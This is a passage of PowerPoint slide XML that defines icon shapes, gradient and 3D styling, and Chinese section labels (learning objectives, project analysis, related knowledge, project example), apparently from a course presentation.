                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="672" y="3092"/>
              <a:ext cx="14823" cy="4347"/>
              <a:chOff x="672" y="3092"/>
              <a:chExt cx="14823" cy="4347"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="19" name="Group 20"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="10984" y="3092"/>
                <a:ext cx="2054" cy="3685"/>
                <a:chOff x="9539460" y="2484779"/>
                <a:chExt cx="1304471" cy="2340121"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="20" name="Group 21"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9539460" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="23" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent5"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="24" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="21" name="Oval 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9904781" y="4239008"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="22" name="AutoShape 59"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10027260" y="4362838"/>
                  <a:ext cx="328869" cy="328308"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10794 23"/>
                    <a:gd name="T1" fmla="*/ T0 w 21543"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T3" fmla="+- 0 10794 23"/>
                    <a:gd name="T4" fmla="*/ T3 w 21543"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T6" fmla="+- 0 10794 23"/>
                    <a:gd name="T7" fmla="*/ T6 w 21543"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21600"/>
                    <a:gd name="T9" fmla="+- 0 10794 23"/>
                    <a:gd name="T10" fmla="*/ T9 w 21543"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21600"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T7" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21543" h="21600">
                      <a:moveTo>
                        <a:pt x="16976" y="19986"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="11226" y="17680"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="11088" y="17626"/>
                        <a:pt x="10946" y="17608"/>
                        <a:pt x="10806" y="17600"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19660" y="3837"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="19660" y="3837"/>
                        <a:pt x="16976" y="19986"/>
                        <a:pt x="16976" y="19986"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="6859" y="16244"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6858" y="16242"/>
                        <a:pt x="6855" y="16240"/>
                        <a:pt x="6854" y="16238"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19606" y="2552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8735" y="19536"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8735" y="19536"/>
                        <a:pt x="6859" y="16244"/>
                        <a:pt x="6859" y="16244"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2111" y="14024"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17712" y="3595"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6369" y="15770"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6309" y="15734"/>
                        <a:pt x="6256" y="15687"/>
                        <a:pt x="6190" y="15660"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6190" y="15660"/>
                        <a:pt x="2111" y="14024"/>
                        <a:pt x="2111" y="14024"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="21234" y="108"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21123" y="35"/>
                        <a:pt x="20996" y="0"/>
                        <a:pt x="20868" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20738" y="0"/>
                        <a:pt x="20608" y="36"/>
                        <a:pt x="20495" y="113"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="299" y="13613"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="13751"/>
                        <a:pt x="-23" y="13995"/>
                        <a:pt x="3" y="14244"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="14494"/>
                        <a:pt x="190" y="14708"/>
                        <a:pt x="422" y="14801"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5689" y="16914"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8166" y="21259"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8284" y="21468"/>
                        <a:pt x="8505" y="21597"/>
                        <a:pt x="8743" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8751" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8987" y="21599"/>
                        <a:pt x="9206" y="21474"/>
                        <a:pt x="9328" y="21271"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10726" y="18934"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17253" y="21551"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="17332" y="21584"/>
                        <a:pt x="17418" y="21599"/>
                        <a:pt x="17502" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17617" y="21599"/>
                        <a:pt x="17731" y="21571"/>
                        <a:pt x="17832" y="21512"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18010" y="21412"/>
                        <a:pt x="18133" y="21238"/>
                        <a:pt x="18167" y="21035"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="21533" y="785"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21576" y="520"/>
                        <a:pt x="21459" y="254"/>
                        <a:pt x="21234" y="108"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solid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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="672" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" dirty="0"/>
                  <a:t>学习目标</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3020" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目分析</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5759" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>相关知识</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
